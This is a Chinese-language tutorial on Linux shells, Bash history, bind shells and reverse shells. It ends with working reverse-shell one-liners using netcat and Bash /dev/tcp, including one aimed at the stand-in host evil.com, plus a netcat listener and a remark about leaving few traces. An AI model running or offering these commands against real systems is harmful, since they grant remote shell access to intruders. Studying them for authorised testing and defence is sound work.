Shell和反向Shell

Shell 是一个用 C 语言编写的程序，它是用户使用 Linux 的桥梁。Shell 既是一种命令语言，又是一种程序设计语言。
Shell 是指一种应用程序，这个应用程序提供了一个界面，用户通过这个界面访问操作系统内核的服务。
Shell 编程跟 JavaScript、php 编程一样，只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。
Linux 的 Shell 种类众多，常见的有：
Bourne Shell（/usr/bin/sh或/bin/sh）
Bourne Again Shell（/bin/bash）
C Shell（/usr/bin/csh）
K Shell（/usr/bin/ksh）
Shell for Root（/sbin/sh）

反向shell的工作方式是远程计算机将自己的shell发送给特定的用户，而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样就可以对远程服务器执行root命令。

bind shell是用户用Bash，将shell绑定到一个本地端口上，这样任何人都可以在本地网络中发送命令。
反向shell经常会被黑客用来做一些不法行为，例如入侵了一台服务器后，他们会设置一个反向shell，将来他们就能通过这个shell轻松的访问这台远程计算机。我相信你是不会用它来做这种事情的。

Bash，Unix shell的一种，在1987年由布莱恩·福克斯为了GNU计划而编写。1989年发布第一个正式版本，原先是计划用在GNU操作系统上，但能运行于大多数类Unix系统的操作系统之上，包括Linux与Mac OS X v10.4都将它作为默认shell。
Bash是一个命令处理器，通常运行于文本窗口中，并能执行用户直接输入的命令。Bash还能从文件中读取命令，这样的文件称为脚本。和其他Unix shell 一样，它支持文件名替换（通配符匹配）、管道、here文档、命令替换、变量，以及条件判断和循环遍历的结构控制语句。包括关键字、语法在内的基本特性全部是从sh借鉴过来的。其他特性，例如历史命令，是从csh和ksh借鉴而来。总的来说，Bash虽然是一个满足POSIX规范的shell，但有很多扩展。

环境要求
远程Unix主机
　　安装了netcat
　　使用NetCat实现反向shell交互
　　当通过shell登录到远程主机后，下面的指令能轻松的将shell发送到你的机器上：
　　nc -c /bin/sh <你的IP> <任何一个未封锁的端口>
　　你甚至能通过netcat来pipe BASH。
　　/bin/sh | nc <你的IP> <任何未封锁的端口>
　　然后监听这个shell：
　　nc -l -p <相同的端口> -vvv
　　通过BASH实现反向shell，这种技术是当远程机器上没有netcat或你想做一些非自然的事情而不想留下太重的痕迹时使用。

监听shell
nc -l -p <任何未封锁的端口> -vvv
　　先创建一个新的描述符，分配到一个网络节点。这样我们可以对这个描述符进行读写。
　　exec 5<>/dev/tcp/evil.com/<相同的端口> $ cat <&5 | while read line; do $line 2>&5 >&5; done
　　或另外一个反向shell：
　　0<&196;exec 196<>/dev/tcp/<你的IP>/<相同的端口>; sh <&196 >&196 2>&196